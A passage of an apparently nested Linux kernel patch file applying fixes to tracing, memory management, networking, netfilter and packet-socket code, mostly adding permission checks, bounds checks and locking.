+-	preempt_enable();
++	on_each_cpu_mask(tracing_buffer_mask, disable_trace_buffered_event,
++			 NULL, true);
+ 
+ 	/* Wait for all current users to finish */
+ 	synchronize_rcu();
+@@ -2773,17 +2728,19 @@ void trace_buffered_event_disable(void)
+ 		free_page((unsigned long)per_cpu(trace_buffered_event, cpu));
+ 		per_cpu(trace_buffered_event, cpu) = NULL;
+ 	}
++
+ 	/*
+-	 * Make sure trace_buffered_event is NULL before clearing
+-	 * trace_buffered_event_cnt.
++	 * Wait for all CPUs that potentially started checking if they can use
++	 * their event buffer only after the previous synchronize_rcu() call and
++	 * they still read a valid pointer from trace_buffered_event. It must be
++	 * ensured they don't see cleared trace_buffered_event_cnt else they
++	 * could wrongly decide to use the pointed-to buffer which is now freed.
+ 	 */
+-	smp_wmb();
++	synchronize_rcu();
+ 
+-	preempt_disable();
+-	/* Do the work on each cpu */
+-	smp_call_function_many(tracing_buffer_mask,
+-			       enable_trace_buffered_event, NULL, 1);
+-	preempt_enable();
++	/* For each CPU, relinquish the buffer */
++	on_each_cpu_mask(tracing_buffer_mask, enable_trace_buffered_event, NULL,
++			 true);
+ }
+ 
+ static struct trace_buffer *temp_buffer;
+@@ -6258,6 +6215,15 @@ static void set_buffer_entries(struct array_buffer *buf, unsigned long val)
+ 		per_cpu_ptr(buf->data, cpu)->entries = val;
+ }
+ 
++static void update_buffer_entries(struct array_buffer *buf, int cpu)
++{
++	if (cpu == RING_BUFFER_ALL_CPUS) {
++		set_buffer_entries(buf, ring_buffer_size(buf->buffer, 0));
++	} else {
++		per_cpu_ptr(buf->data, cpu)->entries = ring_buffer_size(buf->buffer, cpu);
++	}
++}
++
+ #ifdef CONFIG_TRACER_MAX_TRACE
+ /* resize @tr's buffer to the size of @size_tr's entries */
+ static int resize_buffer_duplicate_size(struct array_buffer *trace_buf,
+@@ -6302,13 +6268,15 @@ static int __tracing_resize_ring_buffer(struct trace_array *tr,
+ 	if (!tr->array_buffer.buffer)
+ 		return 0;
+ 
++	/* Do not allow tracing while resizing ring buffer */
++	tracing_stop_tr(tr);
++
+ 	ret = ring_buffer_resize(tr->array_buffer.buffer, size, cpu);
+ 	if (ret < 0)
+-		return ret;
++		goto out_start;
+ 
+ #ifdef CONFIG_TRACER_MAX_TRACE
+-	if (!(tr->flags & TRACE_ARRAY_FL_GLOBAL) ||
+-	    !tr->current_trace->use_max_tr)
++	if (!tr->current_trace->use_max_tr)
+ 		goto out;
+ 
+ 	ret = ring_buffer_resize(tr->max_buffer.buffer, size, cpu);
+@@ -6333,22 +6301,17 @@ static int __tracing_resize_ring_buffer(struct trace_array *tr,
+ 			WARN_ON(1);
+ 			tracing_disabled = 1;
+ 		}
+-		return ret;
++		goto out_start;
+ 	}
+ 
+-	if (cpu == RING_BUFFER_ALL_CPUS)
+-		set_buffer_entries(&tr->max_buffer, size);
+-	else
+-		per_cpu_ptr(tr->max_buffer.data, cpu)->entries = size;
++	update_buffer_entries(&tr->max_buffer, cpu);
+ 
+  out:
+ #endif /* CONFIG_TRACER_MAX_TRACE */
+ 
+-	if (cpu == RING_BUFFER_ALL_CPUS)
+-		set_buffer_entries(&tr->array_buffer, size);
+-	else
+-		per_cpu_ptr(tr->array_buffer.data, cpu)->entries = size;
+-
++	update_buffer_entries(&tr->array_buffer, cpu);
++ out_start:
++	tracing_start_tr(tr);
+ 	return ret;
+ }
+ 
+diff --git a/lib/zstd/common/fse_decompress.c b/lib/zstd/common/fse_decompress.c
+index 2c8bbe3e4c148..f37b7aec088ec 100644
+--- a/lib/zstd/common/fse_decompress.c
++++ b/lib/zstd/common/fse_decompress.c
+@@ -312,7 +312,7 @@ size_t FSE_decompress_wksp(void* dst, size_t dstCapacity, const void* cSrc, size
+ 
+ typedef struct {
+     short ncount[FSE_MAX_SYMBOL_VALUE + 1];
+-    FSE_DTable dtable[1]; /* Dynamically sized */
++    FSE_DTable dtable[]; /* Dynamically sized */
+ } FSE_DecompressWksp;
+ 
+ 
+diff --git a/mm/damon/sysfs.c b/mm/damon/sysfs.c
+index dbf5e4de97a0f..9ea21b6d266be 100644
+--- a/mm/damon/sysfs.c
++++ b/mm/damon/sysfs.c
+@@ -2210,7 +2210,7 @@ static int damon_sysfs_update_target(struct damon_target *target,
+ 		struct damon_ctx *ctx,
+ 		struct damon_sysfs_target *sys_target)
+ {
+-	int err;
++	int err = 0;
+ 
+ 	if (damon_target_has_pid(ctx)) {
+ 		err = damon_sysfs_update_target_pid(target, sys_target->pid);
+diff --git a/mm/filemap.c b/mm/filemap.c
+index 2d930470aacaa..d633ab8cd56f1 100644
+--- a/mm/filemap.c
++++ b/mm/filemap.c
+@@ -3319,7 +3319,7 @@ static bool filemap_map_pmd(struct vm_fault *vmf, struct page *page)
+ 		}
+ 	}
+ 
+-	if (pmd_none(*vmf->pmd))
++	if (pmd_none(*vmf->pmd) && vmf->prealloc_pte)
+ 		pmd_install(mm, vmf->pmd, &vmf->prealloc_pte);
+ 
+ 	/* See comment in handle_pte_fault() */
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index aa4a68dfb3b92..37288a7f0fa65 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -1189,6 +1189,13 @@ static int is_vma_resv_set(struct vm_area_struct *vma, unsigned long flag)
+ 	return (get_vma_private_data(vma) & flag) != 0;
+ }
+ 
++bool __vma_private_lock(struct vm_area_struct *vma)
++{
++	return !(vma->vm_flags & VM_MAYSHARE) &&
++		get_vma_private_data(vma) & ~HPAGE_RESV_MASK &&
++		is_vma_resv_set(vma, HPAGE_RESV_OWNER);
++}
++
+ void hugetlb_dup_vma_private(struct vm_area_struct *vma)
+ {
+ 	VM_BUG_ON_VMA(!is_vm_hugetlb_page(vma), vma);
+diff --git a/net/core/drop_monitor.c b/net/core/drop_monitor.c
+index f084a4a6b7ab2..8e0a90b45df22 100644
+--- a/net/core/drop_monitor.c
++++ b/net/core/drop_monitor.c
+@@ -181,7 +181,7 @@ out:
+ }
+ 
+ static const struct genl_multicast_group dropmon_mcgrps[] = {
+-	{ .name = "events", },
++	{ .name = "events", .cap_sys_admin = 1 },
+ };
+ 
+ static void send_dm_alert(struct work_struct *work)
+@@ -1604,11 +1604,13 @@ static const struct genl_small_ops dropmon_ops[] = {
+ 		.cmd = NET_DM_CMD_START,
+ 		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+ 		.doit = net_dm_cmd_trace,
++		.flags = GENL_ADMIN_PERM,
+ 	},
+ 	{
+ 		.cmd = NET_DM_CMD_STOP,
+ 		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+ 		.doit = net_dm_cmd_trace,
++		.flags = GENL_ADMIN_PERM,
+ 	},
+ 	{
+ 		.cmd = NET_DM_CMD_CONFIG_GET,
+diff --git a/net/core/filter.c b/net/core/filter.c
+index adc327f4af1e9..3a6110ea4009f 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -2582,6 +2582,22 @@ BPF_CALL_2(bpf_msg_cork_bytes, struct sk_msg *, msg, u32, bytes)
+ 	return 0;
+ }
+ 
++static void sk_msg_reset_curr(struct sk_msg *msg)
++{
++	u32 i = msg->sg.start;
++	u32 len = 0;
++
++	do {
++		len += sk_msg_elem(msg, i)->length;
++		sk_msg_iter_var_next(i);
++		if (len >= msg->sg.size)
++			break;
++	} while (i != msg->sg.end);
++
++	msg->sg.curr = i;
++	msg->sg.copybreak = 0;
++}
++
+ static const struct bpf_func_proto bpf_msg_cork_bytes_proto = {
+ 	.func           = bpf_msg_cork_bytes,
+ 	.gpl_only       = false,
+@@ -2701,6 +2717,7 @@ BPF_CALL_4(bpf_msg_pull_data, struct sk_msg *, msg, u32, start,
+ 		      msg->sg.end - shift + NR_MSG_FRAG_IDS :
+ 		      msg->sg.end - shift;
+ out:
++	sk_msg_reset_curr(msg);
+ 	msg->data = sg_virt(&msg->sg.data[first_sge]) + start - offset;
+ 	msg->data_end = msg->data + bytes;
+ 	return 0;
+@@ -2837,6 +2854,7 @@ BPF_CALL_4(bpf_msg_push_data, struct sk_msg *, msg, u32, start,
+ 		msg->sg.data[new] = rsge;
+ 	}
+ 
++	sk_msg_reset_curr(msg);
+ 	sk_msg_compute_data_pointers(msg);
+ 	return 0;
+ }
+@@ -3005,6 +3023,7 @@ BPF_CALL_4(bpf_msg_pop_data, struct sk_msg *, msg, u32, start,
+ 
+ 	sk_mem_uncharge(msg->sk, len - pop);
+ 	msg->sg.size -= (len - pop);
++	sk_msg_reset_curr(msg);
+ 	sk_msg_compute_data_pointers(msg);
+ 	return 0;
+ }
+diff --git a/net/core/scm.c b/net/core/scm.c
+index acb7d776fa6ec..e762a4b8a1d22 100644
+--- a/net/core/scm.c
++++ b/net/core/scm.c
+@@ -26,6 +26,7 @@
+ #include <linux/nsproxy.h>
+ #include <linux/slab.h>
+ #include <linux/errqueue.h>
++#include <linux/io_uring.h>
+ 
+ #include <linux/uaccess.h>
+ 
+@@ -103,6 +104,11 @@ static int scm_fp_copy(struct cmsghdr *cmsg, struct scm_fp_list **fplp)
+ 
+ 		if (fd < 0 || !(file = fget_raw(fd)))
+ 			return -EBADF;
++		/* don't allow io_uring files */
++		if (io_uring_get_socket(file)) {
++			fput(file);
++			return -EINVAL;
++		}
+ 		*fpp++ = file;
+ 		fpl->count++;
+ 	}
+diff --git a/net/ipv4/ip_gre.c b/net/ipv4/ip_gre.c
+index 5b8242265617d..d67d026d7f975 100644
+--- a/net/ipv4/ip_gre.c
++++ b/net/ipv4/ip_gre.c
+@@ -634,15 +634,18 @@ static netdev_tx_t ipgre_xmit(struct sk_buff *skb,
+ 	}
+ 
+ 	if (dev->header_ops) {
++		int pull_len = tunnel->hlen + sizeof(struct iphdr);
++
+ 		if (skb_cow_head(skb, 0))
+ 			goto free_skb;
+ 
+ 		tnl_params = (const struct iphdr *)skb->data;
+ 
+-		/* Pull skb since ip_tunnel_xmit() needs skb->data pointing
+-		 * to gre header.
+-		 */
+-		skb_pull(skb, tunnel->hlen + sizeof(struct iphdr));
++		if (!pskb_network_may_pull(skb, pull_len))
++			goto free_skb;
++
++		/* ip_tunnel_xmit() needs skb->data pointing to gre header. */
++		skb_pull(skb, pull_len);
+ 		skb_reset_mac_header(skb);
+ 
+ 		if (skb->ip_summed == CHECKSUM_PARTIAL &&
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 288678f17ccaf..58409ea2da0af 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -3473,9 +3473,25 @@ int tcp_set_window_clamp(struct sock *sk, int val)
+ 			return -EINVAL;
+ 		tp->window_clamp = 0;
+ 	} else {
+-		tp->window_clamp = val < SOCK_MIN_RCVBUF / 2 ?
+-			SOCK_MIN_RCVBUF / 2 : val;
+-		tp->rcv_ssthresh = min(tp->rcv_wnd, tp->window_clamp);
++		u32 new_rcv_ssthresh, old_window_clamp = tp->window_clamp;
++		u32 new_window_clamp = val < SOCK_MIN_RCVBUF / 2 ?
++						SOCK_MIN_RCVBUF / 2 : val;
++
++		if (new_window_clamp == old_window_clamp)
++			return 0;
++
++		tp->window_clamp = new_window_clamp;
++		if (new_window_clamp < old_window_clamp) {
++			/* need to apply the reserved mem provisioning only
++			 * when shrinking the window clamp
++			 */
++			__tcp_adjust_rcv_ssthresh(sk, tp->window_clamp);
++
++		} else {
++			new_rcv_ssthresh = min(tp->rcv_wnd, tp->window_clamp);
++			tp->rcv_ssthresh = max(new_rcv_ssthresh,
++					       tp->rcv_ssthresh);
++		}
+ 	}
+ 	return 0;
+ }
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index 65dae3d43684f..34460c9b37ae2 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -3803,8 +3803,12 @@ static int tcp_ack(struct sock *sk, const struct sk_buff *skb, int flag)
+ 	 * then we can probably ignore it.
+ 	 */
+ 	if (before(ack, prior_snd_una)) {
++		u32 max_window;
++
++		/* do not accept ACK for bytes we never sent. */
++		max_window = min_t(u64, tp->max_window, tp->bytes_acked);
+ 		/* RFC 5961 5.2 [Blind Data Injection Attack].[Mitigation] */
+-		if (before(ack, prior_snd_una - tp->max_window)) {
++		if (before(ack, prior_snd_una - max_window)) {
+ 			if (!(flag & FLAG_NO_CHALLENGE_ACK))
+ 				tcp_send_challenge_ack(sk);
+ 			return -SKB_DROP_REASON_TCP_TOO_OLD_ACK;
+diff --git a/net/ipv6/ip6_fib.c b/net/ipv6/ip6_fib.c
+index eb6640f9a7921..1840735e9cb07 100644
+--- a/net/ipv6/ip6_fib.c
++++ b/net/ipv6/ip6_fib.c
+@@ -1502,13 +1502,9 @@ out:
+ 			if (!pn_leaf && !(pn->fn_flags & RTN_RTINFO)) {
+ 				pn_leaf = fib6_find_prefix(info->nl_net, table,
+ 							   pn);
+-#if RT6_DEBUG >= 2
+-				if (!pn_leaf) {
+-					WARN_ON(!pn_leaf);
++				if (!pn_leaf)
+ 					pn_leaf =
+ 					    info->nl_net->ipv6.fib6_null_entry;
+-				}
+-#endif
+ 				fib6_info_hold(pn_leaf);
+ 				rcu_assign_pointer(pn->leaf, pn_leaf);
+ 			}
+diff --git a/net/netfilter/ipset/ip_set_core.c b/net/netfilter/ipset/ip_set_core.c
+index 20eede37d5228..d47dfdcb899b0 100644
+--- a/net/netfilter/ipset/ip_set_core.c
++++ b/net/netfilter/ipset/ip_set_core.c
+@@ -61,6 +61,8 @@ MODULE_ALIAS_NFNL_SUBSYS(NFNL_SUBSYS_IPSET);
+ 	ip_set_dereference((inst)->ip_set_list)[id]
+ #define ip_set_ref_netlink(inst,id)	\
+ 	rcu_dereference_raw((inst)->ip_set_list)[id]
++#define ip_set_dereference_nfnl(p)	\
++	rcu_dereference_check(p, lockdep_nfnl_is_held(NFNL_SUBSYS_IPSET))
+ 
+ /* The set types are implemented in modules and registered set types
+  * can be found in ip_set_type_list. Adding/deleting types is
+@@ -708,15 +710,10 @@ __ip_set_put_netlink(struct ip_set *set)
+ static struct ip_set *
+ ip_set_rcu_get(struct net *net, ip_set_id_t index)
+ {
+-	struct ip_set *set;
+ 	struct ip_set_net *inst = ip_set_pernet(net);
+ 
+-	rcu_read_lock();
+-	/* ip_set_list itself needs to be protected */
+-	set = rcu_dereference(inst->ip_set_list)[index];
+-	rcu_read_unlock();
+-
+-	return set;
++	/* ip_set_list and the set pointer need to be protected */
++	return ip_set_dereference_nfnl(inst->ip_set_list)[index];
+ }
+ 
+ static inline void
+@@ -1399,6 +1396,9 @@ static int ip_set_swap(struct sk_buff *skb, const struct nfnl_info *info,
+ 	ip_set(inst, to_id) = from;
+ 	write_unlock_bh(&ip_set_ref_lock);
+ 
++	/* Make sure all readers of the old set pointers are completed. */
++	synchronize_rcu();
++
+ 	return 0;
+ }
+ 
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 421211eba838b..05fa5141af516 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -805,7 +805,7 @@ static struct nft_table *nft_table_lookup(const struct net *net,
+ 
+ static struct nft_table *nft_table_lookup_byhandle(const struct net *net,
+ 						   const struct nlattr *nla,
+-						   u8 genmask, u32 nlpid)
++						   int family, u8 genmask, u32 nlpid)
+ {
+ 	struct nftables_pernet *nft_net;
+ 	struct nft_table *table;
+@@ -813,6 +813,7 @@ static struct nft_table *nft_table_lookup_byhandle(const struct net *net,
+ 	nft_net = nft_pernet(net);
+ 	list_for_each_entry(table, &nft_net->tables, list) {
+ 		if (be64_to_cpu(nla_get_be64(nla)) == table->handle &&
++		    table->family == family &&
+ 		    nft_active_genmask(table, genmask)) {
+ 			if (nft_table_has_owner(table) &&
+ 			    nlpid && table->nlpid != nlpid)
+@@ -1537,7 +1538,7 @@ static int nf_tables_deltable(struct sk_buff *skb, const struct nfnl_info *info,
+ 
+ 	if (nla[NFTA_TABLE_HANDLE]) {
+ 		attr = nla[NFTA_TABLE_HANDLE];
+-		table = nft_table_lookup_byhandle(net, attr, genmask,
++		table = nft_table_lookup_byhandle(net, attr, family, genmask,
+ 						  NETLINK_CB(skb).portid);
+ 	} else {
+ 		attr = nla[NFTA_TABLE_NAME];
+diff --git a/net/netfilter/nft_dynset.c b/net/netfilter/nft_dynset.c
+index cf9a1ae87d9b1..a470e5f612843 100644
+--- a/net/netfilter/nft_dynset.c
++++ b/net/netfilter/nft_dynset.c
+@@ -279,10 +279,15 @@ static int nft_dynset_init(const struct nft_ctx *ctx,
+ 			priv->expr_array[i] = dynset_expr;
+ 			priv->num_exprs++;
+ 
+-			if (set->num_exprs &&
+-			    dynset_expr->ops != set->exprs[i]->ops) {
+-				err = -EOPNOTSUPP;
+-				goto err_expr_free;
++			if (set->num_exprs) {
++				if (i >= set->num_exprs) {
++					err = -EINVAL;
++					goto err_expr_free;
++				}
++				if (dynset_expr->ops != set->exprs[i]->ops) {
++					err = -EOPNOTSUPP;
++					goto err_expr_free;
++				}
+ 			}
+ 			i++;
+ 		}
+diff --git a/net/netfilter/nft_exthdr.c b/net/netfilter/nft_exthdr.c
+index efb50c2b41f32..de588f7b69c45 100644
+--- a/net/netfilter/nft_exthdr.c
++++ b/net/netfilter/nft_exthdr.c
+@@ -10,6 +10,7 @@
+ #include <linux/netlink.h>
+ #include <linux/netfilter.h>
+ #include <linux/netfilter/nf_tables.h>
++#include <linux/dccp.h>
+ #include <linux/sctp.h>
+ #include <net/netfilter/nf_tables_core.h>
+ #include <net/netfilter/nf_tables.h>
+@@ -214,7 +215,7 @@ static void nft_exthdr_tcp_eval(const struct nft_expr *expr,
+ 
+ 		offset = i + priv->offset;
+ 		if (priv->flags & NFT_EXTHDR_F_PRESENT) {
+-			*dest = 1;
++			nft_reg_store8(dest, 1);
+ 		} else {
+ 			if (priv->len % NFT_REG32_SIZE)
+ 				dest[priv->len / NFT_REG32_SIZE] = 0;
+@@ -409,6 +410,82 @@ err:
+ 		regs->verdict.code = NFT_BREAK;
+ }
+ 
++static void nft_exthdr_dccp_eval(const struct nft_expr *expr,
++				 struct nft_regs *regs,
++				 const struct nft_pktinfo *pkt)
++{
++	struct nft_exthdr *priv = nft_expr_priv(expr);
++	unsigned int thoff, dataoff, optoff, optlen, i;
++	u32 *dest = &regs->data[priv->dreg];
++	const struct dccp_hdr *dh;
++	struct dccp_hdr _dh;
++
++	if (pkt->tprot != IPPROTO_DCCP || pkt->fragoff)
++		goto err;
++
++	thoff = nft_thoff(pkt);
++
++	dh = skb_header_pointer(pkt->skb, thoff, sizeof(_dh), &_dh);
++	if (!dh)
++		goto err;
++
++	dataoff = dh->dccph_doff * sizeof(u32);
++	optoff = __dccp_hdr_len(dh);
++	if (dataoff <= optoff)
++		goto err;
++
++	optlen = dataoff - optoff;
++
++	for (i = 0; i < optlen; ) {
++		/* Options 0 (DCCPO_PADDING) - 31 (DCCPO_MAX_RESERVED) are 1B in
++		 * the length; the remaining options are at least 2B long.  In
++		 * all cases, the first byte contains the option type.  In
++		 * multi-byte options, the second byte contains the option
++		 * length, which must be at least two: 1 for the type plus 1 for
++		 * the length plus 0-253 for any following option data.  We
++		 * aren't interested in the option data, only the type and the
++		 * length, so we don't need to read more than two bytes at a
++		 * time.
++		 */
++		unsigned int buflen = optlen - i;
++		u8 buf[2], *bufp;
++		u8 type, len;
++
++		if (buflen > sizeof(buf))
++			buflen = sizeof(buf);
++
++		bufp = skb_header_pointer(pkt->skb, thoff + optoff + i, buflen,
++					  &buf);
++		if (!bufp)
++			goto err;
++
++		type = bufp[0];
++
++		if (type == priv->type) {
++			nft_reg_store8(dest, 1);
++			return;
++		}
++
++		if (type <= DCCPO_MAX_RESERVED) {
++			i++;
++			continue;
++		}
++
++		if (buflen < 2)
++			goto err;
++
++		len = bufp[1];
++
++		if (len < 2)
++			goto err;
++
++		i += len;
++	}
++
++err:
++	*dest = 0;
++}
++
+ static const struct nla_policy nft_exthdr_policy[NFTA_EXTHDR_MAX + 1] = {
+ 	[NFTA_EXTHDR_DREG]		= { .type = NLA_U32 },
+ 	[NFTA_EXTHDR_TYPE]		= { .type = NLA_U8 },
+@@ -560,6 +637,22 @@ static int nft_exthdr_ipv4_init(const struct nft_ctx *ctx,
+ 	return 0;
+ }
+ 
++static int nft_exthdr_dccp_init(const struct nft_ctx *ctx,
++				const struct nft_expr *expr,
++				const struct nlattr * const tb[])
++{
++	struct nft_exthdr *priv = nft_expr_priv(expr);
++	int err = nft_exthdr_init(ctx, expr, tb);
++
++	if (err < 0)
++		return err;
++
++	if (!(priv->flags & NFT_EXTHDR_F_PRESENT))
++		return -EOPNOTSUPP;
++
++	return 0;
++}
++
+ static int nft_exthdr_dump_common(struct sk_buff *skb, const struct nft_exthdr *priv)
+ {
+ 	if (nla_put_u8(skb, NFTA_EXTHDR_TYPE, priv->type))
+@@ -686,6 +779,15 @@ static const struct nft_expr_ops nft_exthdr_sctp_ops = {
+ 	.reduce		= nft_exthdr_reduce,
+ };
+ 
++static const struct nft_expr_ops nft_exthdr_dccp_ops = {
++	.type		= &nft_exthdr_type,
++	.size		= NFT_EXPR_SIZE(sizeof(struct nft_exthdr)),
++	.eval		= nft_exthdr_dccp_eval,
++	.init		= nft_exthdr_dccp_init,
++	.dump		= nft_exthdr_dump,
++	.reduce		= nft_exthdr_reduce,
++};
++
+ static const struct nft_expr_ops *
+ nft_exthdr_select_ops(const struct nft_ctx *ctx,
+ 		      const struct nlattr * const tb[])
+@@ -720,6 +822,10 @@ nft_exthdr_select_ops(const struct nft_ctx *ctx,
+ 		if (tb[NFTA_EXTHDR_DREG])
+ 			return &nft_exthdr_sctp_ops;
+ 		break;
++	case NFT_EXTHDR_OP_DCCP:
++		if (tb[NFTA_EXTHDR_DREG])
++			return &nft_exthdr_dccp_ops;
++		break;
+ 	}
+ 
+ 	return ERR_PTR(-EOPNOTSUPP);
+diff --git a/net/netfilter/nft_fib.c b/net/netfilter/nft_fib.c
+index 1f12d7ade606c..5748415f74d0b 100644
+--- a/net/netfilter/nft_fib.c
++++ b/net/netfilter/nft_fib.c
+@@ -144,11 +144,15 @@ void nft_fib_store_result(void *reg, const struct nft_fib *priv,
+ 	switch (priv->result) {
+ 	case NFT_FIB_RESULT_OIF:
+ 		index = dev ? dev->ifindex : 0;
+-		*dreg = (priv->flags & NFTA_FIB_F_PRESENT) ? !!index : index;
++		if (priv->flags & NFTA_FIB_F_PRESENT)
++			nft_reg_store8(dreg, !!index);
++		else
++			*dreg = index;
++
+ 		break;
+ 	case NFT_FIB_RESULT_OIFNAME:
+ 		if (priv->flags & NFTA_FIB_F_PRESENT)
+-			*dreg = !!dev;
++			nft_reg_store8(dreg, !!dev);
+ 		else
+ 			strncpy(reg, dev ? dev->name : "", IFNAMSIZ);
+ 		break;
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index deea6196d9925..4e1cc31729b80 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -2042,6 +2042,9 @@ static void nft_pipapo_walk(const struct nft_ctx *ctx, struct nft_set *set,
+ 
+ 		e = f->mt[r].e;
+ 
++		if (!nft_set_elem_active(&e->ext, iter->genmask))
++			goto cont;
++
+ 		elem.priv = e;
+ 
+ 		iter->err = iter->fn(ctx, set, iter, &elem);
+diff --git a/net/netfilter/xt_owner.c b/net/netfilter/xt_owner.c
+index e85ce69924aee..50332888c8d23 100644
+--- a/net/netfilter/xt_owner.c
++++ b/net/netfilter/xt_owner.c
+@@ -76,18 +76,23 @@ owner_mt(const struct sk_buff *skb, struct xt_action_param *par)
+ 		 */
+ 		return false;
+ 
+-	filp = sk->sk_socket->file;
+-	if (filp == NULL)
++	read_lock_bh(&sk->sk_callback_lock);
++	filp = sk->sk_socket ? sk->sk_socket->file : NULL;
++	if (filp == NULL) {
++		read_unlock_bh(&sk->sk_callback_lock);
+ 		return ((info->match ^ info->invert) &
+ 		       (XT_OWNER_UID | XT_OWNER_GID)) == 0;
++	}
+ 
+ 	if (info->match & XT_OWNER_UID) {
+ 		kuid_t uid_min = make_kuid(net->user_ns, info->uid_min);
+ 		kuid_t uid_max = make_kuid(net->user_ns, info->uid_max);
+ 		if ((uid_gte(filp->f_cred->fsuid, uid_min) &&
+ 		     uid_lte(filp->f_cred->fsuid, uid_max)) ^
+-		    !(info->invert & XT_OWNER_UID))
++		    !(info->invert & XT_OWNER_UID)) {
++			read_unlock_bh(&sk->sk_callback_lock);
+ 			return false;
++		}
+ 	}
+ 
+ 	if (info->match & XT_OWNER_GID) {
+@@ -112,10 +117,13 @@ owner_mt(const struct sk_buff *skb, struct xt_action_param *par)
+ 			}
+ 		}
+ 
+-		if (match ^ !(info->invert & XT_OWNER_GID))
++		if (match ^ !(info->invert & XT_OWNER_GID)) {
++			read_unlock_bh(&sk->sk_callback_lock);
+ 			return false;
++		}
+ 	}
+ 
++	read_unlock_bh(&sk->sk_callback_lock);
+ 	return true;
+ }
+ 
+diff --git a/net/netlink/genetlink.c b/net/netlink/genetlink.c
+index 3e16527beb914..505d3b910cc29 100644
+--- a/net/netlink/genetlink.c
++++ b/net/netlink/genetlink.c
+@@ -1438,6 +1438,9 @@ static int genl_bind(struct net *net, int group)
+ 		if ((grp->flags & GENL_UNS_ADMIN_PERM) &&
+ 		    !ns_capable(net->user_ns, CAP_NET_ADMIN))
+ 			ret = -EPERM;
++		if (grp->cap_sys_admin &&
++		    !ns_capable(net->user_ns, CAP_SYS_ADMIN))
++			ret = -EPERM;
+ 
+ 		break;
+ 	}
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 451bd8bfafd23..51882f07ef70c 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -4275,7 +4275,7 @@ static void packet_mm_open(struct vm_area_struct *vma)
+ 	struct sock *sk = sock->sk;
+ 
+ 	if (sk)
+-		atomic_inc(&pkt_sk(sk)->mapped);
++		atomic_long_inc(&pkt_sk(sk)->mapped);
+ }
+ 
+ static void packet_mm_close(struct vm_area_struct *vma)
+@@ -4285,7 +4285,7 @@ static void packet_mm_close(struct vm_area_struct *vma)
+ 	struct sock *sk = sock->sk;
+ 
+ 	if (sk)
+-		atomic_dec(&pkt_sk(sk)->mapped);
++		atomic_long_dec(&pkt_sk(sk)->mapped);
+ }
+ 
+ static const struct vm_operations_struct packet_mmap_ops = {
+@@ -4380,7 +4380,7 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
+ 
+ 	err = -EBUSY;
+ 	if (!closing) {
+-		if (atomic_read(&po->mapped))
++		if (atomic_long_read(&po->mapped))
+ 			goto out;
+ 		if (packet_read_pending(rb))
+ 			goto out;
+@@ -4483,7 +4483,7 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
+ 
+ 	err = -EBUSY;
+ 	mutex_lock(&po->pg_vec_lock);
+-	if (closing || atomic_read(&po->mapped) == 0) {
++	if (closing || atomic_long_read(&po->mapped) == 0) {
+ 		err = 0;
+ 		spin_lock_bh(&rb_queue->lock);
+ 		swap(rb->pg_vec, pg_vec);
+@@ -4501,9 +4501,9 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
+ 		po->prot_hook.func = (po->rx_ring.pg_vec) ?
+ 						tpacket_rcv : packet_rcv;
+ 		skb_queue_purge(rb_queue);
+-		if (atomic_read(&po->mapped))
+-			pr_err("packet_mmap: vma is busy: %d\n",
+-			       atomic_read(&po->mapped));
++		if (atomic_long_read(&po->mapped))
++			pr_err("packet_mmap: vma is busy: %ld\n",
++			       atomic_long_read(&po->mapped));
+ 	}
+ 	mutex_unlock(&po->pg_vec_lock);
+ 
+@@ -4581,7 +4581,7 @@ static int packet_mmap(struct file *file, struct socket *sock,
+ 		}
+ 	}
+ 
+-	atomic_inc(&po->mapped);
++	atomic_long_inc(&po->mapped);
+ 	vma->vm_ops = &packet_mmap_ops;
+ 	err = 0;
+ 
+diff --git a/net/packet/internal.h b/net/packet/internal.h
+index 3bae8ea7a36f5..b2edfe6fc8e77 100644
+--- a/net/packet/internal.h
++++ b/net/packet/internal.h
+@@ -126,7 +126,7 @@ struct packet_sock {
+ 	__be16			num;
+ 	struct packet_rollover	*rollover;
+ 	struct packet_mclist	*mclist;
+-	atomic_t		mapped;
++	atomic_long_t		mapped;
+ 	enum tpacket_versions	tp_version;
+ 	unsigned int		tp_hdrlen;
+ 	unsigned int		tp_reserve;
+diff --git a/net/psample/psample.c b/net/psample/psample.c
+index 81a794e36f535..c34e902855dbe 100644
+--- a/net/psample/psample.c
++++ b/net/psample/psample.c
+@@ -31,7 +31,8 @@ enum psample_nl_multicast_groups {
+ 
+ static const struct genl_multicast_group psample_nl_mcgrps[] = {
+ 	[PSAMPLE_NL_MCGRP_CONFIG] = { .name = PSAMPLE_NL_MCGRP_CONFIG_NAME },
+-	[PSAMPLE_NL_MCGRP_SAMPLE] = { .name = PSAMPLE_NL_MCGRP_SAMPLE_NAME },
++	[PSAMPLE_NL_MCGRP_SAMPLE] = { .name = PSAMPLE_NL_MCGRP_SAMPLE_NAME,
++				      .flags = GENL_UNS_ADMIN_PERM },
+ };
+ 
+ static struct genl_family psample_nl_family __ro_after_init;
+diff --git a/net/xdp/xsk.c b/net/xdp/xsk.c
+index f7592638e61d3..5c8e02d56fd43 100644
+--- a/net/xdp/xsk.c
++++ b/net/xdp/xsk.c
+@@ -722,7 +722,7 @@ static __poll_t xsk_poll(struct file *file, struct socket *sock,
+ 
+ 	rcu_read_lock();
+ 	if (xsk_check_common(xs))
+-		goto skip_tx;
++		goto out;
+ 
